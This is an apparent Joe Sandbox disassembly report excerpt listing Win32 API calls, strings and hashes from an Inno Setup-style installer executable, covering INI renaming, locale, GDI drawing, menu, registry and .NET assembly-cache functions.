                                                                              • Instruction Fuzzy Hash: 74B1B430A00284DFD711DF69C585B9EBBF0BF04305F1484AAE8459B792DB78EE45CB16
                                                                              APIs
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                              • API String ID: 390214022-3304407042
                                                                              • Opcode ID: 4acafb8f8444067680350d3d4e03481623aa06ca7574397e5033f2f4cf45a0b5
                                                                              • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                              • Opcode Fuzzy Hash: 4acafb8f8444067680350d3d4e03481623aa06ca7574397e5033f2f4cf45a0b5
                                                                              • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                              APIs
                                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004767C9
                                                                              • SetWindowLongW.USER32(00000000,000000FC,00476724), ref: 004767F0
                                                                              • GetACP.KERNEL32(00000000,00476A08,?,00000000,00476A32), ref: 0047682D
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476873
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ClassInfoLongMessageSendWindow
                                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                                              • API String ID: 3391662889-4234151509
                                                                              • Opcode ID: 7b097581a500be05759954e33284123b2b89370f46c26a428eff7c4db0c5a69c
                                                                              • Instruction ID: bb27e68bfa0a4e6e36c1c9b1f46c00cfa2f47713d75b81585866a7fa3ef15c14
                                                                              • Opcode Fuzzy Hash: 7b097581a500be05759954e33284123b2b89370f46c26a428eff7c4db0c5a69c
                                                                              • Instruction Fuzzy Hash: C0813F746006059FC710EF69D885AEAB7F2FB09304F16C1BAE848E7362D738AD45CB59
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                              • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                              • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                              • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                              • String ID: ,$?
                                                                              • API String ID: 2359071979-2308483597
                                                                              • Opcode ID: b9a2b6ccc88d9caa62c3975205c07352f987ccdbf84bf9e0cd5a88eec52abf91
                                                                              • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                              • Opcode Fuzzy Hash: b9a2b6ccc88d9caa62c3975205c07352f987ccdbf84bf9e0cd5a88eec52abf91
                                                                              • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                              APIs
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                              • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                              • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                              • String ID:
                                                                              • API String ID: 1030595962-0
                                                                              • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                              • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                              • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                              • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                              APIs
                                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                              • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                              • RealizePalette.GDI32(?), ref: 0041CF92
                                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                              • String ID:
                                                                              • API String ID: 2222416421-0
                                                                              • Opcode ID: c6a16a19dcf28552bada6898b81586dc49cb1edacb7efb66bca37046f5d7e7da
                                                                              • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                              • Opcode Fuzzy Hash: c6a16a19dcf28552bada6898b81586dc49cb1edacb7efb66bca37046f5d7e7da
                                                                              • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,?,?), ref: 0045717A
                                                                                • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571E1
                                                                              • TranslateMessage.USER32(?), ref: 004571FF
                                                                              • DispatchMessageA.USER32(?), ref: 00457208
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                              • String ID: [Paused]
                                                                              • API String ID: 1007367021-4230553315
                                                                              • Opcode ID: fd37f0685e9949bc630816f418b91ae10989fde9f4c26f7dfdebc9041f05c988
                                                                              • Instruction ID: 9c65c5789669556775cb04b7d8b700a3e8427f17a0623b42c67a15115a154b53
                                                                              • Opcode Fuzzy Hash: fd37f0685e9949bc630816f418b91ae10989fde9f4c26f7dfdebc9041f05c988
                                                                              • Instruction Fuzzy Hash: 3A3196309082449EDB11DFB5EC81FDEBBB8EB49314F5580B7F800E7292D6389909CB69
                                                                              APIs
                                                                              • GetCursor.USER32(00000000,0046B3D3), ref: 0046B350
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046B35E
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B3D3), ref: 0046B364
                                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B3D3), ref: 0046B36E
                                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B3D3), ref: 0046B374
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LoadSleep
                                                                              • String ID: CheckPassword
                                                                              • API String ID: 4023313301-1302249611
                                                                              • Opcode ID: 9ec6fbb627a2037d8b10d3b03f13e16da416f17f6db7f06dbaba65bff406c05b
                                                                              • Instruction ID: 12e539274ef1f9e2a04eba0c68275a436143f563f239c7c10787bf1112b5c925
                                                                              • Opcode Fuzzy Hash: 9ec6fbb627a2037d8b10d3b03f13e16da416f17f6db7f06dbaba65bff406c05b
                                                                              • Instruction Fuzzy Hash: 883140347402449FD711DB69C899B9A7BE4EB05304F5580B6BC44DB392D7789E80CB99
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045968F
                                                                              Strings
                                                                              • Fusion.dll, xrefs: 0045962F
                                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045969A
                                                                              • CreateAssemblyCache, xrefs: 00459686
                                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00459674
                                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 004596B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                              • API String ID: 190572456-3990135632
                                                                              • Opcode ID: c76a925808990de0a4edfa3a9bd9e2f18b95e6c6c4d3f27ecf656a26428a2687
                                                                              • Instruction ID: 16de9e68b372fd706bfdce8394bce33e03e331de8444419fbf47e642e04e3cf3
                                                                              • Opcode Fuzzy Hash: c76a925808990de0a4edfa3a9bd9e2f18b95e6c6c4d3f27ecf656a26428a2687
                                                                              • Instruction Fuzzy Hash: E1318B71E10605EBCB01EFA9C88159EB7B4EF44315F50857BE814E7382DB389E08C799
                                                                              APIs
                                                                                • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                              • GetFocus.USER32 ref: 0041C168
                                                                              • GetDC.USER32(?), ref: 0041C174
                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                              • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                              • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                              • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                              • String ID:
                                                                              • API String ID: 3303097818-0
                                                                              • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                              • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                              • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                              • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                              • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                • Part of subcall function 004107F8: 6F51C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                              • 6F58CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                              • 6F58C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                              • 6F58CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                              • 6F520860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$C400C740F520860F522980
                                                                              • String ID:
                                                                              • API String ID: 2856677924-0
                                                                              • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                              • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                              • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                              • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483808), ref: 004837ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                              • API String ID: 47109696-2530820420
                                                                              • Opcode ID: 6cffb51fcf675e5b5ff337e99a1a510b156e53e1e1d602fe7582bc6a3ac7d990
                                                                              • Instruction ID: c613687e0df8eb2305741995cd8b82d1e16d8def3fb188134640bd78fd3b844b
                                                                              • Opcode Fuzzy Hash: 6cffb51fcf675e5b5ff337e99a1a510b156e53e1e1d602fe7582bc6a3ac7d990
                                                                              • Instruction Fuzzy Hash: 7711AFB0B00204AAD700FBA68C12A5EBAE8DB55B09F208877A800E7681E73CDB01875C
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00495089
                                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004950AB
                                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495629), ref: 004950BF
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004950E1
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004950FE
                                                                              Strings
                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004950B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                              • API String ID: 2948443157-222967699
                                                                              • Opcode ID: 53fe9a462762cb4918ee61071ab08c48f7ebae39ed882d9ecfdb03bcb5db6ebb
                                                                              • Instruction ID: d310c62e5609ca3062061d10b625b1d271ae10615434581f3ecc8597d6741426
                                                                              • Opcode Fuzzy Hash: 53fe9a462762cb4918ee61071ab08c48f7ebae39ed882d9ecfdb03bcb5db6ebb
                                                                              • Instruction Fuzzy Hash: 76014875A04704BFDB05DBA5CC42F5EB7ECDB49714F614476F604E7281D5789E008B68
                                                                              APIs
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$Delete$Stretch
                                                                              • String ID:
                                                                              • API String ID: 1458357782-0
                                                                              • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                              • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                              • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                              • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 004233AF
                                                                              • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                              • SetCursor.USER32(00000000), ref: 00423413
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                              • String ID:
                                                                              • API String ID: 1770779139-0
